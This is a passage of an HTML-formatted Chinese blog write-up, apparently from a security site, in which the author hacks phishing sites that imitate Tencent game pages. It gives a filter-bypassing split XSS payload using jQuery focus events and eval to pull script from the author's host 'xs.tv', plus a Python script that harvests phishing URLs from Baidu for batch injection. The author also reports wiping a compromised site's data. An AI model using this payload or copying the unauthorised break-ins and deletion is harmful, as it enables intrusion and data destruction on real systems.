break-word;">我接近试了上百个payload,回显都是<span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 16px;">被拦截</span></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268238456503.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">凭着我单身23年的经验发现这个xss 过滤机制可能没那么简单</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">通过不断的模糊测试，发现对方的过滤机制大概如下：</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><blockquote style="box-sizing: border-box; padding: 10px 20px; margin-bottom: 20px; font-size: 14px; border-left: 5px solid rgb(238, 238, 238); background: rgb(247, 247, 247); color: rgb(88, 88, 88); font-family: 微软雅黑;"><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">带有a字符被拦截，已经onmouseover,onload等常见事件全部被过滤，最长处最大长度为32个字符，+，&#等特殊字符被过滤,这就意味着，a标签，各种编码机制都不能用~~真是有够变态的，但是也通过测试得知</span>能够执行的事件有<span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">onscroll,onfocus,onfocus,并且unciode 编码没被过滤，</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">没过滤的标签为 &nbsp;body，input，br,i 标签。</span></p></blockquote><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">只有32个字符能输入，我目前搜集最短的xss paylaod 20个，</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">也就是<script/src=//xs.xs>,但是script早就被过滤了&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">32 个字符，过滤了这么多肯定是构造不了，所以只能用拆分跨站，</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">通过查看源码我发现了一个新的思路。</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268238451981.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">就是他后台调用的jquery框架</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">，</span>&nbsp;<br/><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">由此自己研究出了一个新的拆分跨站</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">思路就是：</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">我们先构造一个函数，只要鼠标滚轮移动，就让所有的事件获取焦点，再用input标签启动onfocus函数 分别加载我的XSS站点（如果你没听懂的话，看看下面的代码）</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">代码如下，</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">首先我们来了解下 一些javascript的事件以及函数</span></p><blockquote style="box-sizing: border-box; padding: 10px 20px; margin-bottom: 20px; font-size: 14px; border-left: 5px solid rgb(238, 238, 238); background: rgb(247, 247, 247); color: rgb(88, 88, 88); font-family: 微软雅黑;"><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">onscroll 事件&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">在元素滚动条在滚动时触发</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0); font-size: 12pt;">onfocus&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">事件在对象获得焦点时发生</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;"><br/></span></p></blockquote><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">以及浏览器的一些特性，</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">当我们输入i标签时，我们不需要输入 闭合标签（原本完整的i标签是</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt; color: rgb(255, 0, 0);">&nbsp;<i id=”i”>12312</i></span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">）</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268238455449.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">而现在我们只需要输入&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">&nbsp;<i id=”i”>12312&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">&nbsp;即可</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">我们进入后台查看如下</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268241473040.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">后面的标签被自动 补上去了</span>&nbsp;</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">了解了这些，看接下来的最新拆分跨站就容易多了</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">，</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">拆分跨站代码如下</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;"><br/></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: justify;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;"><body&nbsp;onscroll=$(`*`).focus()>&nbsp;&nbsp;&nbsp;1<i&nbsp;id="i">$.getScript(`//xs.tv`)&nbsp;&nbsp;2<input/onfocus=s=$("i").text()>&nbsp;&nbsp;3<input/onfocus=ev\u0061l(s)>&nbsp;&nbsp;4&nbsp;<br><br><br><br><br><br><br><br>&nbsp;&nbsp;5</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; font-size: 12pt;">这段代码的意思是，只要对方移动鼠标滑轮或者手机端向下面滑动，就会产生出一个事件 &nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0); font-size: 12pt;">&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">$(`*`).focus()&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">&nbsp;这是jq的选择器，意思是让所有的元素获得焦点</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">然后下面的两个input标签就获取了焦点， &nbsp;而input标签里有一个事件，onfocus，当input标签获取了焦点的时候，就会触发onfocus函数，我在onfocus函数里的代码意思是 获取i标签里的内容（也就是&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">$.getScript(`//xs.tv`)&nbsp;</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">），并且用eval执行它，所以这段代码整体的执行效果就是</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(0, 0, 0);">只要对方移动了滑轮，就会执行 &nbsp;eval(</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">$.getScript(`//xs.tv`))&nbsp;</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">如果你还没看明白的话，那就实践试试吧</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">我们把xss paylad 分成5段分别输入进去</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">效果如下：</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268241485110.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268241487393.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268241489718.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">已经成功加载了我的XSS站点，想要拿下这种类型的后台，就需要两位数的域名</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"><br/></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);">根据这个站点的关键词</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word; color: rgb(255, 0, 0);"></span></p><blockquote style="box-sizing: border-box; padding: 10px 20px; margin-bottom: 20px; font-size: 14px; border-left: 5px solid rgb(238, 238, 238); background: rgb(247, 247, 247); color: rgb(88, 88, 88); font-family: 微软雅黑;"><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">老兵空降回归-绝地求生官方网站-腾讯游戏</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">&nbsp;&nbsp;&nbsp;(吃鸡的钓鱼站找不到)</span></p></blockquote><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268242193096.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">百度一搜索，全是钓鱼界面</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">于是我写了个批量攻击的脚本,先用采集器采集这些钓鱼网址，再批量注入</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">import&nbsp;requestsfrom&nbsp;bs4&nbsp;import&nbsp;BeautifulSoupimport&nbsp;urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
&nbsp;
&nbsp;
headers={
&nbsp;&nbsp;&nbsp;"User-Agent":&nbsp;"Mozilla/5.0&nbsp;(Windows&nbsp;NT&nbsp;10.0;&nbsp;WOW64;&nbsp;rv:48.0)&nbsp;Gecko/20100101&nbsp;Firefox/48.0",
&nbsp;&nbsp;&nbsp;&#39;Accept-Language&#39;&nbsp;:&nbsp;&#39;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&#39;,
&nbsp;&nbsp;&nbsp;&#39;Connection&#39;&nbsp;:&nbsp;&#39;keep-alive&#39;,
&nbsp;&nbsp;&nbsp;&#39;Accept&#39;&nbsp;:&nbsp;&#39;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#39;,
&nbsp;&nbsp;&nbsp;&#39;X-Forwarded-For&#39;:&#39;120.239.169.74&#39;}#设置头部proxies={"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080",
}#设置代理&nbsp;for&nbsp;i&nbsp;in&nbsp;range(0,200,10):&nbsp;&nbsp;#根据百度的url设置搜索1-20页bd_search="https://www.baidu.com/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=%s"&nbsp;%&nbsp;str(i)&nbsp;&nbsp;#关键词搜索r=requests.get(bd_search,headers=headers,verify=False,proxies=proxies,timeout=2)&nbsp;&nbsp;#发起请求f=open("1.html","a+",encoding="utf-8")&nbsp;&nbsp;#把请求结果保存到1.html里f.write(r.text)
f.close()
soup=BeautifulSoup(r.text,"lxml")
url_list=soup.select(".t&nbsp;>&nbsp;a")&nbsp;&nbsp;#对请求回来的内容进行查找，找出a标签里（找出钓鱼链接）for&nbsp;url&nbsp;in&nbsp;url_list:
real_url=url[&#39;href&#39;]&nbsp;&nbsp;#遍历循环，并且打印try:
r=requests.get(real_url,headers=headers,verify=False,proxies=proxies,timeout=2)&nbsp;&nbsp;#再次请求print(r.url)&nbsp;&nbsp;#打印出钓鱼链接f=open("exp.txt","a+",encoding="utf-8")
f.write(r.url+"\n")&nbsp;&nbsp;&nbsp;#把查找到的钓鱼链接保存到exp.txt里f.close()except&nbsp;Exception&nbsp;as&nbsp;e:
print(e)</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">效果如下</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268242192372.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">然后再批量渗透，自己也写了一个批量渗透钓鱼网站的脚本（不打算发，怕被人说我传播黑客工具。。。。）</span><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">拿到的钓鱼网站大部分貌似都没什么账号密码，</span>就看到这个吃鸡的钓鱼站</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268242192441.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/15268242194007.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;">我帮这位老兄删光了</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; word-wrap: break-word; word-break: break-word;"></span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑; text-align: center;"><img src="http://image.3001.net/images/20180520/1526824220233.png!small" alt="攻破黑市之拿下吃鸡DNF等游戏钓鱼站群" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 